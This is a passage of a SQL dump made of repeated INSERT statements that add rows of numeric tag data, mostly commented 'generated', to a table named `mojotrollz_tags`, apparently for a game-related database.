INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6173, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6174, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6175, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6176, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6178, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6179, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6181, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6181, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6182, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6186, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6187, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6193, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6194, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6195, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6200, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6201, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6206, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6206, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6206, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6207, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6207, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6207, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6208, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6208, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6209, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6209, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6210, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6210, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6211, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6211, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6211, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6212, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6212, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6212, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6213, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6213, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6215, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6218, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6218, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6218, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6219, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6219, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6219, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6220, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6220, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6220, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6221, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6221, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6222, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6222, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6223, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6223, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6223, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6224, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6224, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6224, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6225, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6225, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6225, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6226, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6226, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6226, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6227, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6227, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6227, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6228, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6228, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6228, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6229, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6229, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6229, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6230, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6230, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6230, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6231, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6231, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6232, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6232, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6232, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6233, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6233, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6233, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6234, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6234, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6234, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6235, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6235, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6235, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6237, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6239, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6241, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6243, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6243, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6243, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6244, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6247, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6248, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6249, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6251, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6251, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6251, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6251, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6252, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6252, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6252, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6252, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6253, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6253, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6253, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6253, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6254, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6254, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6254, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6254, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6266, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6266, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6266, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6266, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6271, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6272, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6286, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6287, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6287, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6288, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6288, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6289, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6289, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6290, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6290, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6291, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6291, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6292, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6292, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6293, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6293, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6293, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6293, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6293, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6294, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6294, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6295, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6295, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6297, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6298, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6299, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6300, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6301, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6306, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6328, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6329, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6329, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6329, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6348, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6349, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6350, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6351, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6352, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6366, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6367, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6368, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6369, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 